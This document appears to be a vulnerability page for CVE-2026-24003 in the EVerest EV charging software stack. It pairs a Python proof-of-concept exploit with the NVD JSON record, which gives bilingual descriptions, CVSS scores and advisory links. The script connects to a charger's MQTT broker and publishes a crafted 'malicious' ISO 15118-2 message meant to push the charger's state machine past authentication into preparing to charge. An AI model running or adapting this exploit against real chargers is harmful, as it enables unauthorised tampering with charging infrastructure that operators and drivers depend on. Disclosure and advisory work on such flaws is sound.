CVE-2026-24003

import paho.mqtt.client as mqtt import json # CVE-2026-24003 PoC - MQTT Message Injection for EVerest State Bypass # Target: EVerest <= 2025.12.1 with ISO 15118-2 support MQTT_BROKER = "ev_charger_ip" MQTT_PORT = 1883 TARGET_TOPIC = "everest/iso15118/evse/requests" def construct_malicious_iso15118_message(): """ Construct malicious ISO 15118-2 message to trigger state transition This payload targets the EVSEManager state machine bypass """ malicious_payload = { "service_id": 1, "action": "ServiceDiscovery", "session_id": "\x00" * 16, "evse_status": { "ready": True, "isolation_status": "valid", "evse_present_voltage": 400, "evse_present_current": 0 }, "schedule_id": 0, "departure_time": 0, "requested_energy_amount": 50000, "meter_info": { "meter_id": "MALICIOUS_METER", "meter_reading": 0 } } return json.dumps(malicious_payload) def on_connect(client, userdata, flags, rc): print(f"[+] Connected to MQTT broker with result code {rc}") payload = construct_malicious_iso15118_message() client.publish(TARGET_TOPIC, payload) print(f"[+] Published malicious ISO 15118-2 message to {TARGET_TOPIC}") print(f"[+] Payload: {payload}") def exploit(): client = mqtt.Client() client.on_connect = on_connect try: client.connect(MQTT_BROKER, MQTT_PORT, 60) client.loop_forever() except Exception as e: print(f"[-] Connection failed: {e}") if __name__ == "__main__": print("CVE-2026-24003 EVerest State Machine Bypass PoC") print("Target: EVerest EV Charger <= 2025.12.1") print("Attack Vector: ISO 15118-2 MQTT Message Injection") exploit()

{"cve": {"id": "CVE-2026-24003", "sourceIdentifier": "[email protected]", "published": "2026-01-26T22:15:56.513", "lastModified": "2026-02-17T20:48:01.273", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "EVerest is an EV charging software stack. In versions up to and including 2025.12.1, it is possible to bypass the sequence state verification including authentication, and send requests that transition to forbidden states relative to the current one, thereby updating the current context with illegitimate data.cThanks to the modular design of EVerest, authorization is handled in a separate module and EVSEManager Charger internal state machine cannot transition out of the `WaitingForAuthentication` state through ISO 15118-2 communication. From this state, it was however possible through ISO 15118-2 messages which are published to the MQTT server to trick it into preparing to charge, and even to prepare to send current. The final requirement to actually send current to the EV was the closure of the contactors, which does not appear to be possible without leaving the `WaitingForAuthentication` state and leveraging ISO 15118-2 messages. As of time of publication, no fixed versions are available."}, {"lang": "es", "value": "EVerest es una pila de software de carga de vehículos eléctricos. En versiones hasta la 2025.12.1 inclusive, es posible omitir la verificación del estado de la secuencia, incluyendo la autenticación, y enviar solicitudes que transicionan a estados prohibidos en relación con el actual, actualizando así el contexto actual con datos ilegítimos. Gracias al diseño modular de EVerest, la autorización se gestiona en un módulo separado y la máquina de estados interna del cargador EVSEManager no puede transicionar fuera del estado 'WaitingForAuthentication' a través de la comunicación ISO 15118-2. Desde este estado, sin embargo, fue posible a través de mensajes ISO 15118-2 que se publican en el servidor MQTT engañarlo para que se prepare para cargar, e incluso para que se prepare para enviar corriente. El requisito final para enviar corriente al vehículo eléctrico fue el cierre de los contactores, lo cual no parece ser posible sin salir del estado 'WaitingForAuthentication' y aprovechar los mensajes ISO 15118-2. A la fecha de publicación, no hay versiones corregidas disponibles."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-287"}, {"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linuxfoundation:everest:*:*:*:*:*:*:*:*", "versionEndIncluding": "2025.12.1", "matchCriteriaId": "C2054B5F-AED8-4768-8D31-2B05D3CF67EC"}]}]}], "references": [{"url": "https://github.com/EVerest/everest-core/blob/main/modules/EVSE/EvseV2G/iso_server.cpp#L44", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/EVerest/everest-core/security/advisories/GHSA-9vv5-67cv-9crq", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}